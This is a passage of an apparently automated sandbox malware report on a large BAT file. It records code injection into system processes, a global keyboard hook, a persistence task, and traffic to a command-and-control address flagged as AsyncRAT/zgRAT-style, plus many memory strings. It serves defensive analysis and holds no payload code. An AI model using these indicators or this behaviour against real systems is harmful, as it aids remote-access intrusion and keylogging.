        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0000027BFFD3F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F264 FindFirstFileExW,30_2_000001CEE059F264
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CEE059F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F264 FindFirstFileExW,31_2_000001B12B39F264
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000001B12B39F3E8

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 176.65.144.14:4567 -> 192.168.2.6:49687
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\svchost.exeDomain query: ipwho.is
        Source: C:\Windows\System32\svchost.exeDomain query: c.pki.goog
        Source: global trafficTCP traffic: 192.168.2.6:49687 -> 176.65.144.14:4567
        Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
        Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
        Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: C:\Windows\System32\svchost.exeDNS query: name: ipwho.is
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
        Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
        Source: global trafficDNS traffic detected: DNS query: ipwho.is
        Source: global trafficDNS traffic detected: DNS query: c.pki.goog
        Source: svchost.exe, 00000028.00000002.2521437993.000002D66DA5A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/
        Source: lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2566755707.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500137682.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2566755707.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500137682.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: lsass.exe, 00000012.00000000.1499856901.000002158A618000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2549199221.000002158A618000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: powershell.exe, 0000000F.00000002.2535010729.0000015205CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cable
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 00000012.00000000.1499674400.000002158A051000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2535984432.000002158A051000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 0000000C.00000002.1360502922.000002454C4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360502922.000002454C3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2566755707.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500137682.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453C341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: lsass.exe, 00000012.00000000.1499674400.000002158A051000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2535984432.000002158A051000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: svchost.exe, 00000021.00000000.1582566145.0000024467C0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453C341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdC:
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453D7F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 0000000C.00000002.1360502922.000002454C4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360502922.000002454C3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: svchost.exe, 0000002C.00000000.1634990060.000001F3100E8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2520568443.000001F30F281000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
        Source: svchost.exe, 0000002C.00000002.2593194718.000001F30FFC8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
        Source: svchost.exe, 0000001B.00000000.1551921933.00000220C4222000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-am3p.notify.windows.com/?token=AwYAAABko8Pt%2bIZCV9CUJQVFMfcpyzlufwToQyioeYvYvJGchZHf6P
        Source: svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.6:49690 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_802f48c5-9
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_a0d2751b-6
        Source: Yara matchFile source: 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 3316, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Found large BAT file
        Source: skf7iF4.batStatic file information: 6302909
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE5235B8 NtEnumerateKey,NtEnumerateValueKey,16_2_00000234FE5235B8
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE524038 NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,16_2_00000234FE524038
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE523840 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,TlsSetValue,16_2_00000234FE523840
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE2D1C NtQuerySystemInformation,StrCmpNIW,18_2_000002158AEE2D1C
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F088943840 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,TlsSetValue,20_2_000001F088943840
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F0889435B8 NtEnumerateKey,NtEnumerateValueKey,20_2_000001F0889435B8
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC2D1C NtQuerySystemInformation,StrCmpNIW,24_2_0000016588BC2D1C
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE524038: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,16_2_00000234FE524038
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-mPeY5dGdJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BBE7E84_3_000001B780BBE7E8
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BB34384_3_000001B780BB3438
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BBE6644_3_000001B780BBE664
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF3E84_2_000001B780BEF3E8
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE40384_2_000001B780BE4038
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF2644_2_000001B780BEF264
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_00000264072FE7E85_3_00000264072FE7E8
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_00000264072F34385_3_00000264072F3438
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_00000264072FE6645_3_00000264072FE664
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F3E85_2_000002640732F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_00000264073240385_2_0000026407324038
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F2645_2_000002640732F264
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B2A760612_2_00007FF88B2A7606
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE4FE66416_3_00000234FE4FE664
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE4FE7E816_3_00000234FE4FE7E8
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE4F343816_3_00000234FE4F3438
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52403816_2_00000234FE524038
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F26416_2_00000234FE52F264
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F3E816_2_00000234FE52F3E8
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92786E66417_3_000001B92786E664
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92786343817_3_000001B927863438
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92786E7E817_3_000001B92786E7E8
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AEBE66418_3_000002158AEBE664
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AEB343818_3_000002158AEB3438
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AEBE7E818_3_000002158AEBE7E8
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF26418_2_000002158AEEF264
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE403818_2_000002158AEE4038
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF3E818_2_000002158AEEF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDC343819_3_000001E89FDC3438
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDCE7E819_3_000001E89FDCE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDCE66419_3_000001E89FDCE664
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF26419_2_000001E8A01AF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF3E819_2_000001E8A01AF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01A403819_2_000001E8A01A4038
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08891343820_3_000001F088913438
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08891E66420_3_000001F08891E664
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08891E7E820_3_000001F08891E7E8
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894403820_2_000001F088944038
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F26420_2_000001F08894F264
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F3E820_2_000001F08894F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F4E66421_3_000001AC86F4E664
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F4E7E821_3_000001AC86F4E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F4343821_3_000001AC86F43438
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F26421_2_000001AC86F7F264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F3E821_2_000001AC86F7F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7403821_2_000001AC86F74038
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F8E66422_3_0000014785F8E664
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F8343822_3_0000014785F83438
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F8E7E822_3_0000014785F8E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF26422_2_0000014785FBF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FB403822_2_0000014785FB4038
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF3E822_2_0000014785FBF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CE343823_3_000001DC59CE3438
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CEE7E823_3_000001DC59CEE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CEE66423_3_000001DC59CEE664
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1403823_2_000001DC59D14038
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F3E823_2_000001DC59D1F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F26423_2_000001DC59D1F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF26424_2_0000016588BCF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF3E824_2_0000016588BCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC403824_2_0000016588BC4038
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDBE66425_3_0000017A8CDBE664
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDB343825_3_0000017A8CDB3438
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDBE7E825_3_0000017A8CDBE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F3E825_2_0000017A8D34F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34403825_2_0000017A8D344038
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F26425_2_0000017A8D34F264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8B403826_2_000001F34D8B4038
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF3E826_2_000001F34D8BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF26426_2_000001F34D8BF264
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26D343827_3_00000220C26D3438
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26DE66427_3_00000220C26DE664
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26DE7E827_3_00000220C26DE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270403827_2_00000220C2704038
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F26427_2_00000220C270F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F3E827_2_00000220C270F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E6343828_3_0000025AF1E63438
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E6E7E828_3_0000025AF1E6E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E6E66428_3_0000025AF1E6E664
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9403828_2_0000025AF1E94038
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F3E828_2_0000025AF1E9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F26428_2_0000025AF1E9F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5CE66429_3_0000027BFF5CE664
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5C343829_3_0000027BFF5C3438
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5CE7E829_3_0000027BFF5CE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F26429_2_0000027BFFD3F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3403829_2_0000027BFFD34038
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F3E829_2_0000027BFFD3F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE056343830_3_000001CEE0563438
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE056E66430_3_000001CEE056E664
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE056E7E830_3_000001CEE056E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059403830_2_000001CEE0594038
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F26430_2_000001CEE059F264
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F3E830_2_000001CEE059F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B36E66431_3_000001B12B36E664
